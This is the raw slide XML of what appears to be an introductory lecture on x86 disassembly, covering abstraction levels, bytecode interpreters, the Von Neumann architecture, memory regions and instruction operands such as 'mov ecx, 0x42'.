          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Disassembler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(Reverse-Engineering)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4585073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Disassembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Level of Abstraction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Physical; electronical circuits; logic gates (AND, OR, ..)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Firmware (microcode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Only operates on the designed circuit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Set of micro-instructions translated from high machine code level to interact with hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Machine code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Hexadecimal digits generated when high-level language compiled.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Underlying hardware can execute (+ microcode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Low-level languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Human-readable version of a computer architecture's instruction set (e.g. assembly language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21503772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Disassembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>High-level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>C, C++</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Interpreted languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>C#, Perl,. NET, Java, Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>It is NOT complied into machine-code, translated into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Bytecode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> instead.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Bytecode executes within an interpreter which translates bytecode into executables machine code on the fly at runtime.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Reduce the dependence on hardware and OS. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Can run on VM, e.g. JVM</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27814144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Disassembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="Káº¿t quáº£ hÃ¬nh áº£nh cho bytecode interpr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49468"/>
            <a:ext cx="6903566" cy="256756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30" name="Picture 6" descr="Káº¿t quáº£ hÃ¬nh áº£nh cho bytecode interpre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631" y="3964260"/>
            <a:ext cx="6886575"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1310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X86 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Disassembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>X86 Architecture </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Von Neumann architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="972006" y="2294560"/>
            <a:ext cx="5101912" cy="3888432"/>
            <a:chOff x="1619672" y="2420888"/>
            <a:chExt cx="5101912" cy="3888432"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1619672" y="2492896"/>
              <a:ext cx="3600400" cy="2880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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2195736" y="2780928"/>
              <a:ext cx="2664296" cy="9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rapezoid 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2339752" y="4149080"/>
              <a:ext cx="1188132" cy="79208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851920" y="4149080"/>
              <a:ext cx="115212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5796136" y="2492896"/>
              <a:ext cx="792088" cy="2880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619672" y="5661248"/>
              <a:ext cx="360040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2946935" y="3046312"/>
              <a:ext cx="1025987" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Registers</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2705770" y="4209607"/>
              <a:ext cx="558038" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ALU</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3972922" y="4221958"/>
              <a:ext cx="972886" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Control Unit</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2979344" y="5800618"/>
              <a:ext cx="1254318" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>I/O Devices</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5732659" y="3415644"/>
              <a:ext cx="988925" cy="923330"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Main</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Memory</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>RAM</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Left-Right Arrow 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5004048" y="4394273"/>
              <a:ext cx="728611" cy="3308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3132774" y="2420888"/>
              <a:ext cx="574196" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                <a:t>CPU</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Left-Right Arrow 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="2750794" y="3749587"/>
              <a:ext cx="450541" cy="31342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Left-Right Arrow 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="2594901" y="5123372"/>
              <a:ext cx="720080" cy="3556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Left-Right Arrow 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3401379" y="4464789"/>
              <a:ext cx="450541" cy="31342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 name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020272" y="2919984"/>
            <a:ext cx="1944216" cy="3677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7164288" y="3429000"/>
            <a:ext cx="1656184" cy="302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7236628" y="2919984"/>
            <a:ext cx="1511504" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Main memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7665815" y="3595304"/>
            <a:ext cx="677173" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7653793" y="4310506"/>
            <a:ext cx="676788" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7666672" y="5157192"/>
            <a:ext cx="667170" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7693748" y="5998326"/>
            <a:ext cx="620554" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Connector 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7164288" y="4083279"/>
            <a:ext cx="1656184" cy="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206203" y="4814840"/>
            <a:ext cx="1656184" cy="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7204243" y="5858956"/>
            <a:ext cx="1656184" cy="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407604" y="3399752"/>
            <a:ext cx="612668" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>LMA</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6407604" y="6045497"/>
            <a:ext cx="659155" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>MA</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19950905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X86 Disassembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Opcodes and Endianness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Operands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Immediate: 0x42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Register: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Memory address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1899727432"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1619672" y="1700808"/>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GB" dirty="0" smtClean="0"/>
                        <a:t>Mnemonic</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>Dest</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.. Operand</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Source operand</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>0x42</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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53079190"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1619672" y="3212976"/>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GB" dirty="0" smtClean="0"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
